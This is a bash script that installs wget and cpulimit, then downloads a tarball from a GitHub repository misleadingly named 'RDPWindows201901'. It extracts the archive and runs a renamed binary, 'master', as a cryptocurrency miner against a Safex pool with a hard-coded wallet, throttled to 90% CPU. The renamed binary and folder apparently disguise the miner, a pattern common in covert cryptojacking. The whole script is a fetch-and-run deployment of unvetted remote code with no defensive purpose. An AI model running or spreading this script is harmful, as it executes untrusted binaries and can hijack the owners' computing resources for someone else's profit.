#!/bin/bash
apt-get update 
apt-get install -y wget cpulimit
wget https://github.com/duitawa/RDPWindows201901/raw/master/citel.tar.gz
tar xf citel.tar.gz
cd citel
cpulimit -l 90 -e master &
./master -a rx/sfx -o pool.safex.org:3311 -u Safex5yuPhr9TAZMoZ3ZfQ5ERrEBB51QsGqpuHjJKLEj6CJ5CvuQPMXRcC37iQZSvtXPrhQEJopMc2W41VMLzyqGd2u7NcyUmKW2X -p PROXY --donate-level 1 -k
